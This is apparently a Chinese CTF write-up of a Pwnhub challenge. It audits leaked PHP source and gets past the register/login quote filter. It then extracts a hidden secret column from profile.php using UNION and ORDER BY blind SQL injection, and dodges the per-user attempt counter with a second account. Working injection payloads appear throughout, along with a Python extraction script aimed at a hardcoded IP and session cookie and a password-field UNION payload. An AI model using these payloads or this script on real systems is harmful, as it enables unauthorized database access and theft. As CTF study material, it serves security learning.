Pwnhub会员日

太菜了错失5k

首先扫目录发现register.php,然后注册一下，发现profile.php?id=xx,然后id=2显示hintthisissource.php,下载源码，审计。登录和注册处发现过滤了单引号和斜杠

1
if(strlen($username) < 3 or preg_match("|'|",$username) or preg_match("|\\\\|",$username))

然后在profile.php里发现，id只过滤了. ( ) _，然后可以子查询，id=0 union select 1,2,3,4,5，然后发现2字段可显，然后钻牛角尖注了一个晚上没弄出来。

后来再看一遍源码发现

1
2
3
4
5
6
7
8
CREATE TABLE `users` (
  `id` int(5) NOT NULL AUTO_INCREMENT,
  `user` varchar(20) DEFAULT NULL,
  `pass` varchar(32) DEFAULT NULL,
  `$secret` varchar(36) DEFAULT NULL,
  `count` int(3) DEFAULT NULL,
  PRIMARY KEY (`id`)
)

$secret在第4个字段，然后经过学长提醒可以用order by 注入，顿时想起以前的博文里有个知识点。虽然有查询次数的限制

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
if($row['count'] == 140)
        {

            if(mysql_query("update users set $secret='{$duihuanma}' where user='$username';"))
            {
                mysql_query("update users set count=0 where user='$username';");
                die("<center><br><h3>尝试次数过多，兑换码已经重置</h3></center>");
            }
            return $duihuanma;
        }

但这里的username是session里的，可以注册两个号，一个大号一个小号，拿小号的session跑大号的id，这样小号的$secret会无限重置，但大号纹丝不动。所以上脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
import hashlib
import random

url = 'http://54.223.59.178/profile.php?id='
cookie = {'PHPSESSID':'03faiapvojtao8uhs323venhd4'}
string = '0123456789abcdefghijklmnopqrstuvwxyz{'

ch = 'apohnw4bjlyr62qicd5f18zexkt9vu7gm3'

for i in range(36):
    for k in range(37):
        payload = '29 union select 1,2,3,\''+ch+str(string[k])+'\',5 order by 4'
        re = requests.get(url=url+payload,cookies=cookie)
        #print(re.text)
        if 'hammer' in re.text:
            ch = ch + string[k-1]
            print(ch)
            break
    if len(ch) == 36:
        break


while 1:
    s = ''.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890',4))
    if hashlib.md5(s.encode('utf_8')).hexdigest()[0:4] == 'ee3c':
        print(s)
        break

这个脚本不是很稳定，当跑崩的时候把最后一位删了重新跑就ok

EOF

其实还可以注password，一点过滤都没有

1
$sql = "select id,user from users where user = '$username' and pass = md5('$password')";

所以payload: username=ashdasohdia&password=1') union select d,1 from (select 1 as a,2 as b,3 as c,4 as d,5 as f from users where id = 0 union select * from users where id = 29) as a%23 username一定要xjb打，就是让它查不到在302跳转的id里就有$secret

文章目录

EOF